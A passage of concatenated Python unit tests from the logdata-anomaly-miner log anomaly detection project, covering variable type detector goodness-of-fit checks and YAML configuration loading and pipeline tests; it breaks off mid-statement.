pickle.load(f) # skipcq: BAN-B301 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test='KS') vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test='CM') result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'uni': variable_type_ini = variable_type_ini[:-1] elif 'uni' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'uni': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'uni': variable_type_ini = variable_type_ini[:-1] elif 'uni' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'uni': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == uni_result_shapes_ks) self.assertTrue(result_list_cm == uni_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'nor': variable_type_ini = variable_type_ini[:-1] elif 'nor' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'nor': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'nor': variable_type_ini = variable_type_ini[:-1] elif 'nor' in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'nor': variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == nor_result_shapes_ks) self.assertTrue(result_list_cm == nor_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif 'beta1' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif 'beta1' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta1_result_shapes_ks) self.assertTrue(result_list_cm == beta1_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif 'beta2' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif 'beta2' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta2_result_shapes_ks) self.assertTrue(result_list_cm == beta2_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif 'beta3' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif 'beta3' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta3_result_shapes_ks) self.assertTrue(result_list_cm == beta3_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif 'beta4' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif 'beta4' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta4_result_shapes_ks) self.assertTrue(result_list_cm == beta4_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif 'beta5' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif 'beta5' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta5_result_shapes_ks) self.assertTrue(result_list_cm == beta5_result_shapes_cm) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/__init__.py000066400000000000000000000000001437606560100257060ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/000077500000000000000000000000001437606560100226755ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/YamlConfigTest.py000066400000000000000000001475021437606560100261500ustar00rootroot00000000000000import unittest import importlib import yaml import sys import re import aminer.AminerConfig as AminerConfig from datetime import datetime from aminer.AnalysisChild import AnalysisContext from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.analysis.HistogramAnalysis import HistogramAnalysis, PathDependentHistogramAnalysis from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from time import time from unit.TestBase import TestBase class YamlConfigTest(TestBase): """Unittests for the YamlConfig.""" sysp = sys.path def setUp(self): """Add the aminer syspath.""" TestBase.setUp(self) sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] def tearDown(self): """Reset the syspath.""" TestBase.tearDown(self) sys.path = self.sysp def test1_load_generic_yaml_file(self): """Loads a yaml file into the variable aminer_config.yaml_data.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') self.assertIsNotNone(aminer_config.yaml_data) def test2_load_notexistent_yaml_file(self): """Tries to load a nonexistent yaml file. A FileNotFoundError is expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(FileNotFoundError): aminer_config.load_yaml('unit/data/configfiles/doesnotexist.yml') def test3_load_invalid_yaml_file(self): """Tries to load a file with invalid yaml syntax. Expects an YAMLError.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(yaml.YAMLError): aminer_config.load_yaml('unit/data/configfiles/invalid_config.yml') def test4_load_yaml_file_with_invalid_schema(self): """Tries to load a yaml-file with an invalid schema. A ValueError is expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/invalid_schema.yml') def test5_analysis_pipeline_working_config(self): """This test builds a analysis_pipeline from a valid yaml-file.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], TimestampsUnsortedDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.registered_components[4][0], HistogramAnalysis)) self.assertTrue(isinstance(context.registered_components[5][0], PathDependentHistogramAnalysis)) self.assertTrue(isinstance(context.registered_components[6][0], EnhancedNewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.registered_components[7][0], MatchFilter)) self.assertTrue(isinstance(context.registered_components[8][0], MatchValueAverageChangeDetector)) self.assertTrue(isinstance(context.registered_components[9][0], MatchValueStreamWriter)) self.assertTrue(isinstance(context.registered_components[10][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[11][0], TimeCorrelationViolationDetector)) self.assertTrue(isinstance(context.registered_components[12][0], AllowlistViolationDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[1], SyslogWriterEventHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[2], DefaultMailNotificationEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[1].element_id, 'sp0') self.assertEqual(context.atomizer_factory.parsing_model.children[1].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[3].element_id, 'sp1') self.assertEqual(context.atomizer_factory.parsing_model.children[3].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[5].element_id, 'sp2') self.assertEqual(context.atomizer_factory.parsing_model.children[5].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[7].element_id, 'sq3') self.assertEqual(context.atomizer_factory.parsing_model.children[7].fixed_data, b' "') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[9].element_id, 'sp3') self.assertEqual(context.atomizer_factory.parsing_model.children[9].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[11].element_id, 'http1') self.assertEqual(context.atomizer_factory.parsing_model.children[11].fixed_data, b' HTTP/') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[13].element_id, 'sq4') self.assertEqual(context.atomizer_factory.parsing_model.children[13].fixed_data, b'" ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[15].element_id, 'sp4') self.assertEqual(context.atomizer_factory.parsing_model.children[15].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[17].element_id, 'sq5') self.assertEqual(context.atomizer_factory.parsing_model.children[17].fixed_data, b' "-" "') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog') def test6_analysis_fail_without_parser_start(self): """This test checks if the aminer fails without a start-tag for the first parser-model.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/missing_parserstart_config.yml') def test7_analysis_fail_with_double_parser_start(self): """This test checks if the aminer fails without a start-tag for the first parser-model.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/double_parserstart_config.yml') def test8_analysis_fail_with_unknown_parser_start(self): """This test checks if the config-schema-validator raises an error if an unknown parser is configured.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/unknown_parser_config.yml') try: aminer_config.load_yaml('unit/data/configfiles/unknown_parser_config.yml') except ValueError as e: self.assertEqual("{'Parser': [{0: [{'type': [\"field 'type' cannot be coerced: No module named 'UnknownModel'\"]}]}]}", str(e)) def test9_analysis_pipeline_working_config_without_analysis_components(self): """This test checks if the config can be loaded without any analysis components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components_null_analysis_components.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) del aminer_config.yaml_data['Analysis'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) def test10_analysis_fail_with_unknown_analysis_component(self): """This test checks if the config-schema-validator raises an error if an unknown analysis component is configured.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/unknown_analysis_component.yml') try: aminer_config.load_yaml('unit/data/configfiles/unknown_analysis_component.yml') except ValueError as e: self.assertEqual("Config-Error: {'Analysis': [{2: ['none or more than one rule validate', {'Analysis error': 'unallowed value" " UnknownDetector'}]}]}", str(e)) def test11_analysis_fail_with_unknown_event_handler(self): """This test checks if the config-schema-validator raises an error if an unknown event handler is configured.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/unknown_event_handler.yml') try: aminer_config.load_yaml('unit/data/configfiles/unknown_event_handler.yml') except ValueError as e: self.assertEqual("{'EventHandlers': [{0: [{'type': [\"field 'type' cannot be coerced: No module named " "'aminer.events.UnknownPrinterEventHandler'\"]}]}]}", str(e)) def test12_analysis_pipeline_working_config_without_event_handler_components(self): """ This test checks if the config can be loaded without any event handler components. This also tests if the StreamPrinterEventHandler was loaded by default. """ spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components_null_event_handlers.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) del aminer_config.yaml_data['EventHandlers'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) def test13_analysis_pipeline_working_with_json(self): """This test checks if JsonConverterHandler is working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/json_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], JsonConverterHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0].json_event_handlers[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) def test14_analysis_pipeline_working_with_learnMode(self): """This test checks if learnMode is working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/learnMode_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) # specific learn_mode arguments should be preferred. context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(context.registered_components[1][0].learn_mode) self.assertTrue(context.registered_components[2][0].learn_mode) self.assertFalse(context.registered_components[3][0].learn_mode) # unset specific learn_mode parameters and set LearnMode True. for component in aminer_config.yaml_data['Analysis']: del component['learn_mode'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for key in context.registered_components: if hasattr(context.registered_components[key][0], 'learn_mode'): self.assertTrue(context.registered_components[key][0].learn_mode) # unset specific learn_mode parameters and set LearnMode False. aminer_config.yaml_data['LearnMode'] = False context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for key in context.registered_components: if hasattr(context.registered_components[key][0], 'learn_mode'): self.assertFalse(context.registered_components[key][0].learn_mode) # unset LearnMode config property. An Error should be raised. del aminer_config.yaml_data['LearnMode'] context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test15_analysis_pipeline_working_with_input_parameters(self): """This test checks if the SimpleMultisourceAtomSync and SimpleByteStreamLineAtomizerFactory are working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiSource_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) # test with MultiSource: True. Expects a SimpleByteStreamLineAtomizerFactory with a SimpleMultisourceAtomSync. self.assertTrue(isinstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)) self.assertTrue(isinstance(context.atomizer_factory.atom_handler_list[0], SimpleMultisourceAtomSync)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']]) # test with MultiSource: False. Expects a SimpleByteStreamLineAtomizerFactory with a AtomFilters.SubhandlerFilter. aminer_config.yaml_data['Input']['multi_source'] = False context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.atomizer_factory, 